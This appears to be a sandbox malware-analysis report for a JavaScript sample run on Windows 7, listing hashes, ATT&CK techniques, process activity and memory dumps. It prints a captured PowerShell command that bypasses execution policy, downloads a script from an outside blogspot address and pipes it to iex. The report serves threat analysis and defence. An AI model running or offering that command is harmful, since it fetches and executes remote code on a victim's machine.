d9e9cd6107b1f2a44a9d0ff9cf16eca68680851d7f0eead5830c5f2a01b6c003

Analysis

max time kernel
121s
max time network
121s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
06-05-2024 07:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d59eb32c67feacb9d79fe315bf304d5f .js
Size

1.3MB
MD5

d59eb32c67feacb9d79fe315bf304d5f
SHA1

a3bfbfa3216bd083085d47583cfc991731ee2f4b
SHA256

d9e9cd6107b1f2a44a9d0ff9cf16eca68680851d7f0eead5830c5f2a01b6c003
SHA512

44fdbb965adbc4ecd77dd5035fc7c76f822764bd41c765a41eafd6227b2515ba898a86f36aecab2d6f2222129f5123f455b74322fbbb25bab090cdd310a02085
SSDEEP

768:IJqH+QqJcx5TnTi9ta7SuHiHwdcU6AH6xgO:xqo5TnTi9A6H9AH83

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2108 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2108 powershell.exe

pid	process
2108	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2108	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

wscript.exe

description	pid	process	target process
PID 2032 wrote to memory of 2108	2032	wscript.exe	powershell.exe
PID 2032 wrote to memory of 2108	2032	wscript.exe	powershell.exe
PID 2032 wrote to memory of 2108	2032	wscript.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\d59eb32c67feacb9d79fe315bf304d5f .js"
1⤵
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm mainhotel5may.blogspot.com//////////////////////hehehehe) | . iex;Start-Sleep -Seconds 3;
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2108

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2108-4-0x000007FEF5B6E000-0x000007FEF5B6F000-memory.dmp

Filesize
4KB

Download
memory/2108-5-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/2108-6-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/2108-7-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp

Filesize
9.6MB

Download
memory/2108-8-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp

Filesize
9.6MB

Download
memory/2108-9-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp

Filesize
9.6MB

Download
memory/2108-10-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp

Filesize
9.6MB

Download
memory/2108-11-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp

Filesize
9.6MB

Download
memory/2108-12-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp

Filesize
9.6MB

Download